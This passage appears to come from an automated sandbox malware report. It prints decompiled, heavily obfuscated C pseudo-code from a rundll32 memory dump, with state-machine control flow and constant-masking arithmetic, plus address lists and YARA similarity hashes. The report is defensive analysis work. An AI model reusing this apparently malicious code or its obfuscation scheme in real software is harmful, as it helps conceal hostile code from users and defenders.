				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E00373C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E0038DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E0038DCF7(_v1068, 0x371000, __eflags);
									_pop(_t222);
									_t209 =  *0x393e10; // 0x0
									_t237 =  *0x393e10; // 0x0
									E003747CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E0037A8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E003913AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}










































                                                                                                                                                            0x003759f2
                                                                                                                                                            0x003759f8
                                                                                                                                                            0x00375a02
                                                                                                                                                            0x00375a0a
                                                                                                                                                            0x00375a0f
                                                                                                                                                            0x00375a1b
                                                                                                                                                            0x00375a1d
                                                                                                                                                            0x00375a21
                                                                                                                                                            0x00375a29
                                                                                                                                                            0x00375a31
                                                                                                                                                            0x00375a39
                                                                                                                                                            0x00375a41
                                                                                                                                                            0x00375a4d
                                                                                                                                                            0x00375a50
                                                                                                                                                            0x00375a54
                                                                                                                                                            0x00375a5c
                                                                                                                                                            0x00375a64
                                                                                                                                                            0x00375a74
                                                                                                                                                            0x00375a78
                                                                                                                                                            0x00375a80
                                                                                                                                                            0x00375a88
                                                                                                                                                            0x00375a8d
                                                                                                                                                            0x00375a99
                                                                                                                                                            0x00375a9e
                                                                                                                                                            0x00375aa4
                                                                                                                                                            0x00375aac
                                                                                                                                                            0x00375ab4
                                                                                                                                                            0x00375abc
                                                                                                                                                            0x00375ac4
                                                                                                                                                            0x00375acc
                                                                                                                                                            0x00375ad9
                                                                                                                                                            0x00375ada
                                                                                                                                                            0x00375ae3
                                                                                                                                                            0x00375ae7
                                                                                                                                                            0x00375aef
                                                                                                                                                            0x00375af7
                                                                                                                                                            0x00375aff
                                                                                                                                                            0x00375b07
                                                                                                                                                            0x00375b0f
                                                                                                                                                            0x00375b14
                                                                                                                                                            0x00375b1c
                                                                                                                                                            0x00375b24
                                                                                                                                                            0x00375b28
                                                                                                                                                            0x00375b30
                                                                                                                                                            0x00375b38
                                                                                                                                                            0x00375b40
                                                                                                                                                            0x00375b45
                                                                                                                                                            0x00375b4d
                                                                                                                                                            0x00375b55
                                                                                                                                                            0x00375b63
                                                                                                                                                            0x00375b67
                                                                                                                                                            0x00375b6f
                                                                                                                                                            0x00375b77
                                                                                                                                                            0x00375b84
                                                                                                                                                            0x00375b88
                                                                                                                                                            0x00375b95
                                                                                                                                                            0x00375b99
                                                                                                                                                            0x00375ba1
                                                                                                                                                            0x00375ba9
                                                                                                                                                            0x00375bae
                                                                                                                                                            0x00375bb6
                                                                                                                                                            0x00375bbe
                                                                                                                                                            0x00375bc8
                                                                                                                                                            0x00375bd5
                                                                                                                                                            0x00375be2
                                                                                                                                                            0x00375bea
                                                                                                                                                            0x00375bf2
                                                                                                                                                            0x00375bfa
                                                                                                                                                            0x00375c02
                                                                                                                                                            0x00375c0a
                                                                                                                                                            0x00375c12
                                                                                                                                                            0x00375c1a
                                                                                                                                                            0x00375c1f
                                                                                                                                                            0x00375c27
                                                                                                                                                            0x00375c2f
                                                                                                                                                            0x00375c34
                                                                                                                                                            0x00375c39
                                                                                                                                                            0x00375c41
                                                                                                                                                            0x00375c49
                                                                                                                                                            0x00375c57
                                                                                                                                                            0x00375c5a
                                                                                                                                                            0x00375c5e
                                                                                                                                                            0x00375c66
                                                                                                                                                            0x00375c6e
                                                                                                                                                            0x00375c76
                                                                                                                                                            0x00375c7e
                                                                                                                                                            0x00375c86
                                                                                                                                                            0x00375c8e
                                                                                                                                                            0x00375c96
                                                                                                                                                            0x00375ca3
                                                                                                                                                            0x00375ca7
                                                                                                                                                            0x00375caf
                                                                                                                                                            0x00375caf
                                                                                                                                                            0x00375cc1
                                                                                                                                                            0x00375dc8
                                                                                                                                                            0x00375cc7
                                                                                                                                                            0x00375cc9
                                                                                                                                                            0x00375d69
                                                                                                                                                            0x00375d6e
                                                                                                                                                            0x00375d71
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375ccf
                                                                                                                                                            0x00375cd1
                                                                                                                                                            0x00375ce3
                                                                                                                                                            0x00375cec
                                                                                                                                                            0x00375cf4
                                                                                                                                                            0x00375cfa
                                                                                                                                                            0x00375d05
                                                                                                                                                            0x00375d1c
                                                                                                                                                            0x00375d2f
                                                                                                                                                            0x00375d3e
                                                                                                                                                            0x00375d43
                                                                                                                                                            0x00375d46
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375cd3
                                                                                                                                                            0x00375cd9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375cdf
                                                                                                                                                            0x00375cdf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375cdf
                                                                                                                                                            0x00375cd9
                                                                                                                                                            0x00375cd1
                                                                                                                                                            0x00375cc9
                                                                                                                                                            0x00375dd0
                                                                                                                                                            0x00375ddc
                                                                                                                                                            0x00375ddc
                                                                                                                                                            0x00375d78
                                                                                                                                                            0x00375d80
                                                                                                                                                            0x00375d81
                                                                                                                                                            0x00375d90
                                                                                                                                                            0x00375d97
                                                                                                                                                            0x00375d9b
                                                                                                                                                            0x00375d9d
                                                                                                                                                            0x00375da0
                                                                                                                                                            0x00375da5
                                                                                                                                                            0x00375da5
                                                                                                                                                            0x00375da5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &($&($%.
                                                                                                                                                            • API String ID: 0-466442461
                                                                                                                                                            • Opcode ID: 1fa5815adaab6488fb8d8ce76defae62ded81f8a118374e3a4c58ba2bd075cc9
                                                                                                                                                            • Instruction ID: 574063f0214be49e9d4a6f36e925a37c831c0946b6430893b6dfac90b4235a84
                                                                                                                                                            • Opcode Fuzzy Hash: 1fa5815adaab6488fb8d8ce76defae62ded81f8a118374e3a4c58ba2bd075cc9
                                                                                                                                                            • Instruction Fuzzy Hash: 53A12FB11083819FC769CF66C58941BFBF1FBC4758F108A1DF5A696220D7B98A0ACF46
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003913AD Relevance: 3.9, Strings: 3, Instructions: 169COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E003913AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E003820B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E00374B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E00374B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E00374B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E00373BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E00373BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E00374DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}









                                                                                                                                                            0x003913ae
                                                                                                                                                            0x003913b9
                                                                                                                                                            0x003913be
                                                                                                                                                            0x003913c1
                                                                                                                                                            0x003913c4
                                                                                                                                                            0x003913c5
                                                                                                                                                            0x003913c6
                                                                                                                                                            0x003913cb
                                                                                                                                                            0x003913cf
                                                                                                                                                            0x003913d3
                                                                                                                                                            0x003913da
                                                                                                                                                            0x003913e1
                                                                                                                                                            0x003913e8
                                                                                                                                                            0x003913ef
                                                                                                                                                            0x003913f2
                                                                                                                                                            0x003913f9
                                                                                                                                                            0x00391404
                                                                                                                                                            0x0039140b
                                                                                                                                                            0x00391412
                                                                                                                                                            0x00391415
                                                                                                                                                            0x0039141c
                                                                                                                                                            0x00391423
                                                                                                                                                            0x0039142a
                                                                                                                                                            0x00391431
                                                                                                                                                            0x00391438
                                                                                                                                                            0x0039143c
                                                                                                                                                            0x00391440
                                                                                                                                                            0x00391447
                                                                                                                                                            0x0039144e
                                                                                                                                                            0x00391455
                                                                                                                                                            0x0039145c
                                                                                                                                                            0x00391460
                                                                                                                                                            0x00391467
                                                                                                                                                            0x0039146e
                                                                                                                                                            0x00391475
                                                                                                                                                            0x0039147c
                                                                                                                                                            0x00391483
                                                                                                                                                            0x0039148a
                                                                                                                                                            0x00391491
                                                                                                                                                            0x00391498
                                                                                                                                                            0x0039149f
                                                                                                                                                            0x003914a6
                                                                                                                                                            0x003914ad
                                                                                                                                                            0x003914b4
                                                                                                                                                            0x003914bb
                                                                                                                                                            0x003914bf
                                                                                                                                                            0x003914c6
                                                                                                                                                            0x003914cd
                                                                                                                                                            0x003914d4
                                                                                                                                                            0x003914db
                                                                                                                                                            0x003914e2
                                                                                                                                                            0x003914e9
                                                                                                                                                            0x003914f0
                                                                                                                                                            0x003914f4
                                                                                                                                                            0x003914f8
                                                                                                                                                            0x003914ff
                                                                                                                                                            0x00391506
                                                                                                                                                            0x00391513
                                                                                                                                                            0x0039151a
                                                                                                                                                            0x00391525
                                                                                                                                                            0x00391528
                                                                                                                                                            0x0039152f
                                                                                                                                                            0x00391536
                                                                                                                                                            0x0039153d
                                                                                                                                                            0x00391544
                                                                                                                                                            0x00391548
                                                                                                                                                            0x0039154f
                                                                                                                                                            0x00391556
                                                                                                                                                            0x0039155a
                                                                                                                                                            0x00391561
                                                                                                                                                            0x00391568
                                                                                                                                                            0x0039156f
                                                                                                                                                            0x00391576
                                                                                                                                                            0x0039157a
                                                                                                                                                            0x00391581
                                                                                                                                                            0x0039158a
                                                                                                                                                            0x00391591
                                                                                                                                                            0x0039159e
                                                                                                                                                            0x0039159f
                                                                                                                                                            0x003915a2
                                                                                                                                                            0x003915a6
                                                                                                                                                            0x003915ad
                                                                                                                                                            0x003915b4
                                                                                                                                                            0x003915c0
                                                                                                                                                            0x003915c3
                                                                                                                                                            0x003915c6
                                                                                                                                                            0x003915cd
                                                                                                                                                            0x003915d4
                                                                                                                                                            0x003915df
                                                                                                                                                            0x003915e2
                                                                                                                                                            0x003915e9
                                                                                                                                                            0x003915f0
                                                                                                                                                            0x003915f7
                                                                                                                                                            0x003915fe
                                                                                                                                                            0x00391609
                                                                                                                                                            0x0039160c
                                                                                                                                                            0x00391613
                                                                                                                                                            0x00391616
                                                                                                                                                            0x0039161b
                                                                                                                                                            0x0039161c
                                                                                                                                                            0x00391629
                                                                                                                                                            0x00391632
                                                                                                                                                            0x0039163f
                                                                                                                                                            0x00391648
                                                                                                                                                            0x0039164d
                                                                                                                                                            0x00391661
                                                                                                                                                            0x00391666
                                                                                                                                                            0x0039167c
                                                                                                                                                            0x00391684
                                                                                                                                                            0x00391687
                                                                                                                                                            0x0039168d
                                                                                                                                                            0x00391693
                                                                                                                                                            0x00391696
                                                                                                                                                            0x0039169c
                                                                                                                                                            0x003916b0
                                                                                                                                                            0x003916ba
                                                                                                                                                            0x003916c4
                                                                                                                                                            0x003916cc

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !h$5M$d,
                                                                                                                                                            • API String ID: 0-3324333736
                                                                                                                                                            • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                                            • Instruction ID: f326043d7d5119d560eaf42f2a7e9d15beca523a495de0bf5d798bd7c065ff43
                                                                                                                                                            • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                                            • Instruction Fuzzy Hash: 2491CEB140038C9BCF59CF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038DEDC Relevance: 3.9, Strings: 3, Instructions: 162COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E00380DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E00390E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E00377FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E00373DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E0038AC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                                                            0x0038dee3
                                                                                                                                                            0x0038deea
                                                                                                                                                            0x0038def1
                                                                                                                                                            0x0038def3
                                                                                                                                                            0x0038def4
                                                                                                                                                            0x0038defb
                                                                                                                                                            0x0038df02
                                                                                                                                                            0x0038df03
                                                                                                                                                            0x0038df04
                                                                                                                                                            0x0038df09
                                                                                                                                                            0x0038df11
                                                                                                                                                            0x0038df14
                                                                                                                                                            0x0038df1b
                                                                                                                                                            0x0038df23
                                                                                                                                                            0x0038df28
                                                                                                                                                            0x0038df30
                                                                                                                                                            0x0038df38
                                                                                                                                                            0x0038df40
                                                                                                                                                            0x0038df48
                                                                                                                                                            0x0038df50
                                                                                                                                                            0x0038df58
                                                                                                                                                            0x0038df60
                                                                                                                                                            0x0038df68
                                                                                                                                                            0x0038df70
                                                                                                                                                            0x0038df78
                                                                                                                                                            0x0038df80
                                                                                                                                                            0x0038df85
                                                                                                                                                            0x0038df8a
                                                                                                                                                            0x0038df92
                                                                                                                                                            0x0038df9a
                                                                                                                                                            0x0038dfa6
                                                                                                                                                            0x0038dfa9
                                                                                                                                                            0x0038dfad
                                                                                                                                                            0x0038dfb5
                                                                                                                                                            0x0038dfbd
                                                                                                                                                            0x0038dfc5
                                                                                                                                                            0x0038dfcd
                                                                                                                                                            0x0038dfd5
                                                                                                                                                            0x0038dfdd
                                                                                                                                                            0x0038dfe5
                                                                                                                                                            0x0038dfed
                                                                                                                                                            0x0038dffa
                                                                                                                                                            0x0038dffe
                                                                                                                                                            0x0038e006
                                                                                                                                                            0x0038e00e
                                                                                                                                                            0x0038e016
                                                                                                                                                            0x0038e01e
                                                                                                                                                            0x0038e026
                                                                                                                                                            0x0038e02e
                                                                                                                                                            0x0038e036
                                                                                                                                                            0x0038e044
                                                                                                                                                            0x0038e045
                                                                                                                                                            0x0038e049
                                                                                                                                                            0x0038e051
                                                                                                                                                            0x0038e059
                                                                                                                                                            0x0038e061
                                                                                                                                                            0x0038e069
                                                                                                                                                            0x0038e071
                                                                                                                                                            0x0038e079
                                                                                                                                                            0x0038e081
                                                                                                                                                            0x0038e089
                                                                                                                                                            0x0038e099
                                                                                                                                                            0x0038e0a1
                                                                                                                                                            0x0038e0ae
                                                                                                                                                            0x0038e0b2
                                                                                                                                                            0x0038e0cc
